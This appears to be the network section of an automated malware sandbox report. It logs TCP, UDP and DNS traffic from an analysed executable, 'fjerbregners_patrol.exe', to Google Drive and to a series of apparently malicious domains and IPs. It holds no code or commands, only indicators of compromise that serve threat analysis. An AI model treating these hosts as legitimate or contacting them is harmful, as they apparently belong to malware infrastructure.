                                                                                                                                                                                          Aug 10, 2023 10:20:12.685066938 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.685061932 CEST4974180192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:12.685122013 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.685342073 CEST4974180192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:12.685342073 CEST4974180192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:12.730936050 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.731054068 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.731132984 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.731240034 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.731308937 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.731364965 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.731379032 CEST4974180192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:12.731420994 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.731477976 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.731530905 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.731555939 CEST4974180192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:12.731555939 CEST4974180192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:12.731585979 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.731643915 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.731676102 CEST4974180192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:12.731698990 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.731754065 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.731806993 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.731863022 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.731915951 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.731970072 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.732008934 CEST4974180192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:12.732047081 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.732117891 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.732173920 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.732218027 CEST4974180192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:12.732218027 CEST4974180192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:12.732228041 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.732283115 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.732337952 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.732355118 CEST4974180192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:12.732383966 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.732570887 CEST4974180192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:12.732745886 CEST4974180192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:12.732911110 CEST4974180192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:12.778773069 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:17.998917103 CEST4974280192.168.11.20119.18.54.51
                                                                                                                                                                                          Aug 10, 2023 10:20:18.124171019 CEST8049742119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:18.124342918 CEST4974280192.168.11.20119.18.54.51
                                                                                                                                                                                          Aug 10, 2023 10:20:18.124456882 CEST4974280192.168.11.20119.18.54.51
                                                                                                                                                                                          Aug 10, 2023 10:20:18.249504089 CEST8049742119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:19.635731936 CEST4974280192.168.11.20119.18.54.51
                                                                                                                                                                                          Aug 10, 2023 10:20:19.802145958 CEST8049742119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:20.028390884 CEST8049742119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:20.028495073 CEST8049742119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:20.028577089 CEST8049742119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:20.028603077 CEST4974280192.168.11.20119.18.54.51
                                                                                                                                                                                          Aug 10, 2023 10:20:20.028667927 CEST4974280192.168.11.20119.18.54.51
                                                                                                                                                                                          Aug 10, 2023 10:20:20.028753996 CEST4974280192.168.11.20119.18.54.51
                                                                                                                                                                                          Aug 10, 2023 10:20:20.651496887 CEST4974380192.168.11.20119.18.54.51
                                                                                                                                                                                          Aug 10, 2023 10:20:20.776273966 CEST8049743119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:20.776621103 CEST4974380192.168.11.20119.18.54.51
                                                                                                                                                                                          Aug 10, 2023 10:20:20.776721954 CEST4974380192.168.11.20119.18.54.51
                                                                                                                                                                                          Aug 10, 2023 10:20:20.901554108 CEST8049743119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:22.291347027 CEST4974380192.168.11.20119.18.54.51
                                                                                                                                                                                          Aug 10, 2023 10:20:22.457537889 CEST8049743119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:22.694406986 CEST8049743119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:22.694484949 CEST8049743119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:22.694523096 CEST8049743119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:22.694689989 CEST4974380192.168.11.20119.18.54.51
                                                                                                                                                                                          Aug 10, 2023 10:20:22.694689989 CEST4974380192.168.11.20119.18.54.51
                                                                                                                                                                                          Aug 10, 2023 10:20:22.694761992 CEST4974380192.168.11.20119.18.54.51
                                                                                                                                                                                          Aug 10, 2023 10:20:23.307153940 CEST4974480192.168.11.20119.18.54.51
                                                                                                                                                                                          Aug 10, 2023 10:20:23.434396029 CEST8049744119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:23.434660912 CEST4974480192.168.11.20119.18.54.51
                                                                                                                                                                                          Aug 10, 2023 10:20:23.435220003 CEST4974480192.168.11.20119.18.54.51
                                                                                                                                                                                          Aug 10, 2023 10:20:23.562697887 CEST8049744119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:23.562767982 CEST8049744119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:23.562814951 CEST8049744119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:23.562856913 CEST8049744119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:23.562896967 CEST8049744119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:23.562947989 CEST4974480192.168.11.20119.18.54.51
                                                                                                                                                                                          Aug 10, 2023 10:20:23.563141108 CEST4974480192.168.11.20119.18.54.51
                                                                                                                                                                                          Aug 10, 2023 10:20:23.686851978 CEST8049744119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:23.686960936 CEST8049744119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:23.687036991 CEST8049744119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:23.687094927 CEST8049744119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:23.687135935 CEST8049744119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:23.687136889 CEST4974480192.168.11.20119.18.54.51
                                                                                                                                                                                          Aug 10, 2023 10:20:23.687329054 CEST4974480192.168.11.20119.18.54.51
                                                                                                                                                                                          Aug 10, 2023 10:20:23.687424898 CEST4974480192.168.11.20119.18.54.51
                                                                                                                                                                                          Aug 10, 2023 10:20:23.688730955 CEST8049744119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:23.688812971 CEST8049744119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:23.688872099 CEST8049744119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:23.688932896 CEST8049744119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:23.688981056 CEST8049744119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:23.689023972 CEST8049744119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:23.689069033 CEST8049744119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:23.811331987 CEST8049744119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:23.820363998 CEST8049744119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:23.820445061 CEST8049744119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:23.833096981 CEST8049744119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:24.947062016 CEST4974480192.168.11.20119.18.54.51
                                                                                                                                                                                          Aug 10, 2023 10:20:25.127963066 CEST8049744119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:25.425239086 CEST8049744119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:25.425261974 CEST8049744119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:25.425281048 CEST8049744119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:25.425518036 CEST4974480192.168.11.20119.18.54.51
                                                                                                                                                                                          Aug 10, 2023 10:20:25.425518036 CEST4974480192.168.11.20119.18.54.51
                                                                                                                                                                                          Aug 10, 2023 10:20:25.425674915 CEST4974480192.168.11.20119.18.54.51
                                                                                                                                                                                          Aug 10, 2023 10:20:25.962893963 CEST4974580192.168.11.20119.18.54.51
                                                                                                                                                                                          Aug 10, 2023 10:20:26.111352921 CEST8049745119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:26.111620903 CEST4974580192.168.11.20119.18.54.51
                                                                                                                                                                                          Aug 10, 2023 10:20:26.111767054 CEST4974580192.168.11.20119.18.54.51
                                                                                                                                                                                          Aug 10, 2023 10:20:26.253757000 CEST8049745119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:30.344439030 CEST8049745119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:30.344516993 CEST8049745119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:30.344574928 CEST8049745119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:30.344630957 CEST8049745119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:30.344686031 CEST8049745119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:30.344741106 CEST8049745119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:30.344777107 CEST4974580192.168.11.20119.18.54.51
                                                                                                                                                                                          Aug 10, 2023 10:20:30.344777107 CEST4974580192.168.11.20119.18.54.51
                                                                                                                                                                                          Aug 10, 2023 10:20:30.344799042 CEST8049745119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:30.344857931 CEST8049745119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:30.344914913 CEST8049745119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:30.344970942 CEST8049745119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:30.345010996 CEST4974580192.168.11.20119.18.54.51
                                                                                                                                                                                          Aug 10, 2023 10:20:30.345166922 CEST4974580192.168.11.20119.18.54.51
                                                                                                                                                                                          Aug 10, 2023 10:20:30.345166922 CEST4974580192.168.11.20119.18.54.51
                                                                                                                                                                                          Aug 10, 2023 10:20:30.472068071 CEST8049745119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:30.472096920 CEST8049745119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:30.472119093 CEST8049745119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:30.472141027 CEST8049745119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:30.472162008 CEST8049745119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:30.472183943 CEST8049745119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:30.472206116 CEST8049745119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:30.472228050 CEST8049745119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:30.472249031 CEST8049745119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:30.472270966 CEST8049745119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:30.472292900 CEST8049745119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:30.472313881 CEST8049745119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:30.472398996 CEST4974580192.168.11.20119.18.54.51
                                                                                                                                                                                          Aug 10, 2023 10:20:30.472398996 CEST4974580192.168.11.20119.18.54.51
                                                                                                                                                                                          Aug 10, 2023 10:20:30.472456932 CEST8049745119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:30.472485065 CEST8049745119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:30.472507000 CEST8049745119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:30.472528934 CEST8049745119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:30.472552061 CEST8049745119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:30.472565889 CEST4974580192.168.11.20119.18.54.51
                                                                                                                                                                                          Aug 10, 2023 10:20:30.472565889 CEST4974580192.168.11.20119.18.54.51
                                                                                                                                                                                          Aug 10, 2023 10:20:30.472734928 CEST4974580192.168.11.20119.18.54.51
                                                                                                                                                                                          Aug 10, 2023 10:20:30.472908974 CEST4974580192.168.11.20119.18.54.51
                                                                                                                                                                                          Aug 10, 2023 10:20:30.473094940 CEST4974580192.168.11.20119.18.54.51
                                                                                                                                                                                          Aug 10, 2023 10:20:30.600203991 CEST8049745119.18.54.51192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:36.038172960 CEST4974680192.168.11.2043.154.67.170
                                                                                                                                                                                          Aug 10, 2023 10:20:36.293737888 CEST804974643.154.67.170192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:36.294008017 CEST4974680192.168.11.2043.154.67.170
                                                                                                                                                                                          Aug 10, 2023 10:20:36.294109106 CEST4974680192.168.11.2043.154.67.170
                                                                                                                                                                                          Aug 10, 2023 10:20:36.549751997 CEST804974643.154.67.170192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:36.549787045 CEST804974643.154.67.170192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:36.549810886 CEST804974643.154.67.170192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:36.549947023 CEST4974680192.168.11.2043.154.67.170
                                                                                                                                                                                          Aug 10, 2023 10:20:37.803783894 CEST4974680192.168.11.2043.154.67.170
                                                                                                                                                                                          Aug 10, 2023 10:20:38.819340944 CEST4974780192.168.11.2043.154.67.170
                                                                                                                                                                                          Aug 10, 2023 10:20:39.074779034 CEST804974743.154.67.170192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:39.074955940 CEST4974780192.168.11.2043.154.67.170
                                                                                                                                                                                          Aug 10, 2023 10:20:39.075086117 CEST4974780192.168.11.2043.154.67.170
                                                                                                                                                                                          Aug 10, 2023 10:20:39.331702948 CEST804974743.154.67.170192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:39.331764936 CEST804974743.154.67.170192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:39.331828117 CEST804974743.154.67.170192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:39.332072020 CEST4974780192.168.11.2043.154.67.170
                                                                                                                                                                                          Aug 10, 2023 10:20:40.584261894 CEST4974780192.168.11.2043.154.67.170
                                                                                                                                                                                          Aug 10, 2023 10:20:41.600006104 CEST4974880192.168.11.2043.154.67.170
                                                                                                                                                                                          Aug 10, 2023 10:20:41.855052948 CEST804974843.154.67.170192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:41.855644941 CEST4974880192.168.11.2043.154.67.170
                                                                                                                                                                                          Aug 10, 2023 10:20:41.856244087 CEST4974880192.168.11.2043.154.67.170
                                                                                                                                                                                          Aug 10, 2023 10:20:41.856267929 CEST4974880192.168.11.2043.154.67.170
                                                                                                                                                                                          Aug 10, 2023 10:20:41.856313944 CEST4974880192.168.11.2043.154.67.170
                                                                                                                                                                                          Aug 10, 2023 10:20:42.112421989 CEST804974843.154.67.170192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:42.112483025 CEST804974843.154.67.170192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:42.112524986 CEST804974843.154.67.170192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:42.112565041 CEST804974843.154.67.170192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:42.112649918 CEST804974843.154.67.170192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:42.112663031 CEST4974880192.168.11.2043.154.67.170
                                                                                                                                                                                          Aug 10, 2023 10:20:42.112725019 CEST804974843.154.67.170192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:42.112797976 CEST804974843.154.67.170192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:42.112842083 CEST4974880192.168.11.2043.154.67.170
                                                                                                                                                                                          Aug 10, 2023 10:20:42.112864971 CEST804974843.154.67.170192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:42.112937927 CEST804974843.154.67.170192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:42.112988949 CEST804974843.154.67.170192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:42.112989902 CEST4974880192.168.11.2043.154.67.170
                                                                                                                                                                                          Aug 10, 2023 10:20:42.113162041 CEST4974880192.168.11.2043.154.67.170
                                                                                                                                                                                          Aug 10, 2023 10:20:42.369734049 CEST804974843.154.67.170192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:42.369755983 CEST804974843.154.67.170192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:42.369939089 CEST804974843.154.67.170192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:42.369961023 CEST804974843.154.67.170192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:42.370045900 CEST804974843.154.67.170192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:42.370131969 CEST804974843.154.67.170192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:42.370270967 CEST804974843.154.67.170192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:42.370388031 CEST804974843.154.67.170192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:42.370404005 CEST804974843.154.67.170192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:42.370419979 CEST804974843.154.67.170192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:42.370563984 CEST804974843.154.67.170192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:42.370687962 CEST804974843.154.67.170192.168.11.20

                                                                                                                                                                                          UDP Packets

                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                          Aug 10, 2023 10:17:28.930092096 CEST6153553192.168.11.201.1.1.1
                                                                                                                                                                                          Aug 10, 2023 10:17:28.939048052 CEST53615351.1.1.1192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:17:30.076280117 CEST5672753192.168.11.201.1.1.1
                                                                                                                                                                                          Aug 10, 2023 10:17:30.107186079 CEST53567271.1.1.1192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:18:46.706773043 CEST6472953192.168.11.201.1.1.1
                                                                                                                                                                                          Aug 10, 2023 10:18:47.718533993 CEST6472953192.168.11.209.9.9.9
                                                                                                                                                                                          Aug 10, 2023 10:18:48.020164013 CEST53647291.1.1.1192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:18:48.961523056 CEST53647299.9.9.9192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:18:58.482376099 CEST6320353192.168.11.201.1.1.1
                                                                                                                                                                                          Aug 10, 2023 10:18:58.497658968 CEST53632031.1.1.1192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:11.885862112 CEST5262853192.168.11.201.1.1.1
                                                                                                                                                                                          Aug 10, 2023 10:19:11.917318106 CEST53526281.1.1.1192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:25.601711988 CEST5598153192.168.11.201.1.1.1
                                                                                                                                                                                          Aug 10, 2023 10:19:25.619359016 CEST53559811.1.1.1192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:38.270347118 CEST6243753192.168.11.201.1.1.1
                                                                                                                                                                                          Aug 10, 2023 10:19:38.530724049 CEST53624371.1.1.1192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:19:51.876687050 CEST5139153192.168.11.201.1.1.1
                                                                                                                                                                                          Aug 10, 2023 10:19:51.890088081 CEST53513911.1.1.1192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:04.686371088 CEST5449253192.168.11.201.1.1.1
                                                                                                                                                                                          Aug 10, 2023 10:20:04.812942982 CEST53544921.1.1.1192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:17.746145964 CEST6265453192.168.11.201.1.1.1
                                                                                                                                                                                          Aug 10, 2023 10:20:17.998008013 CEST53626541.1.1.1192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:35.476622105 CEST5933753192.168.11.201.1.1.1
                                                                                                                                                                                          Aug 10, 2023 10:20:36.037488937 CEST53593371.1.1.1192.168.11.20

                                                                                                                                                                                          DNS Queries

                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                          Aug 10, 2023 10:17:28.930092096 CEST192.168.11.201.1.1.10x6568Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                          Aug 10, 2023 10:17:30.076280117 CEST192.168.11.201.1.1.10x2a43Standard query (0)doc-0g-2c-docs.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                          Aug 10, 2023 10:18:46.706773043 CEST192.168.11.201.1.1.10xbc65Standard query (0)www.kepaoqin.topA (IP address)IN (0x0001)false
                                                                                                                                                                                          Aug 10, 2023 10:18:47.718533993 CEST192.168.11.209.9.9.90xbc65Standard query (0)www.kepaoqin.topA (IP address)IN (0x0001)false
                                                                                                                                                                                          Aug 10, 2023 10:18:58.482376099 CEST192.168.11.201.1.1.10x1cf3Standard query (0)www.handsome-sex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                          Aug 10, 2023 10:19:11.885862112 CEST192.168.11.201.1.1.10xa675Standard query (0)www.sonokmall.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                          Aug 10, 2023 10:19:25.601711988 CEST192.168.11.201.1.1.10x6328Standard query (0)www.zenturasolutions.comA (IP address)IN (0x0001)false
                                                                                                                                                                                          Aug 10, 2023 10:19:38.270347118 CEST192.168.11.201.1.1.10xf0dStandard query (0)www.wolfcapital.topA (IP address)IN (0x0001)false
                                                                                                                                                                                          Aug 10, 2023 10:19:51.876687050 CEST192.168.11.201.1.1.10x3c14Standard query (0)www.openlend.latA (IP address)IN (0x0001)false
                                                                                                                                                                                          Aug 10, 2023 10:20:04.686371088 CEST192.168.11.201.1.1.10x253fStandard query (0)www.legalinmedia.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                                          Aug 10, 2023 10:20:17.746145964 CEST192.168.11.201.1.1.10xa03bStandard query (0)www.ladakhzesmo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                          Aug 10, 2023 10:20:35.476622105 CEST192.168.11.201.1.1.10x6939Standard query (0)www.fgnvcmef.clickA (IP address)IN (0x0001)false

                                                                                                                                                                                          DNS Answers

                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                          Aug 10, 2023 10:17:28.939048052 CEST1.1.1.1192.168.11.200x6568No error (0)drive.google.com142.250.185.206A (IP address)IN (0x0001)false
                                                                                                                                                                                          Aug 10, 2023 10:17:30.107186079 CEST1.1.1.1192.168.11.200x2a43No error (0)doc-0g-2c-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Aug 10, 2023 10:17:30.107186079 CEST1.1.1.1192.168.11.200x2a43No error (0)googlehosted.l.googleusercontent.com142.250.185.129A (IP address)IN (0x0001)false
                                                                                                                                                                                          Aug 10, 2023 10:18:48.020164013 CEST1.1.1.1192.168.11.200xbc65No error (0)www.kepaoqin.top107.148.17.67A (IP address)IN (0x0001)false
                                                                                                                                                                                          Aug 10, 2023 10:18:48.961523056 CEST9.9.9.9192.168.11.200xbc65No error (0)www.kepaoqin.top107.148.17.67A (IP address)IN (0x0001)false
                                                                                                                                                                                          Aug 10, 2023 10:18:58.497658968 CEST1.1.1.1192.168.11.200x1cf3No error (0)www.handsome-sex.comhandsome-sex.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Aug 10, 2023 10:18:58.497658968 CEST1.1.1.1192.168.11.200x1cf3No error (0)handsome-sex.com96.44.182.131A (IP address)IN (0x0001)false
                                                                                                                                                                                          Aug 10, 2023 10:19:11.917318106 CEST1.1.1.1192.168.11.200xa675No error (0)www.sonokmall.info162.0.239.145A (IP address)IN (0x0001)false
                                                                                                                                                                                          Aug 10, 2023 10:19:25.619359016 CEST1.1.1.1192.168.11.200x6328No error (0)www.zenturasolutions.com104.21.62.30A (IP address)IN (0x0001)false
                                                                                                                                                                                          Aug 10, 2023 10:19:25.619359016 CEST1.1.1.1192.168.11.200x6328No error (0)www.zenturasolutions.com172.67.219.102A (IP address)IN (0x0001)false
                                                                                                                                                                                          Aug 10, 2023 10:19:38.530724049 CEST1.1.1.1192.168.11.200xf0dNo error (0)www.wolfcapital.topwolfcapital.topCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Aug 10, 2023 10:19:38.530724049 CEST1.1.1.1192.168.11.200xf0dNo error (0)wolfcapital.top51.79.96.115A (IP address)IN (0x0001)false
                                                                                                                                                                                          Aug 10, 2023 10:19:51.890088081 CEST1.1.1.1192.168.11.200x3c14No error (0)www.openlend.lat169.150.247.39A (IP address)IN (0x0001)false
                                                                                                                                                                                          Aug 10, 2023 10:20:04.812942982 CEST1.1.1.1192.168.11.200x253fNo error (0)www.legalinmedia.online91.189.114.27A (IP address)IN (0x0001)false
                                                                                                                                                                                          Aug 10, 2023 10:20:17.998008013 CEST1.1.1.1192.168.11.200xa03bNo error (0)www.ladakhzesmo.com119.18.54.51A (IP address)IN (0x0001)false
                                                                                                                                                                                          Aug 10, 2023 10:20:36.037488937 CEST1.1.1.1192.168.11.200x6939No error (0)www.fgnvcmef.click43.154.67.170A (IP address)IN (0x0001)false

                                                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                                                          • drive.google.com
                                                                                                                                                                                          • doc-0g-2c-docs.googleusercontent.com
                                                                                                                                                                                          • www.kepaoqin.top
                                                                                                                                                                                          • www.handsome-sex.com
                                                                                                                                                                                          • www.sonokmall.info
                                                                                                                                                                                          • www.zenturasolutions.com
                                                                                                                                                                                          • www.wolfcapital.top
                                                                                                                                                                                          • www.openlend.lat
                                                                                                                                                                                          • www.legalinmedia.online
                                                                                                                                                                                          • www.ladakhzesmo.com
                                                                                                                                                                                          • www.fgnvcmef.click

                                                                                                                                                                                          HTTP Packets

                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          0192.168.11.2049715142.250.185.206443C:\Users\user\Desktop\fjerbregners_patrol.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
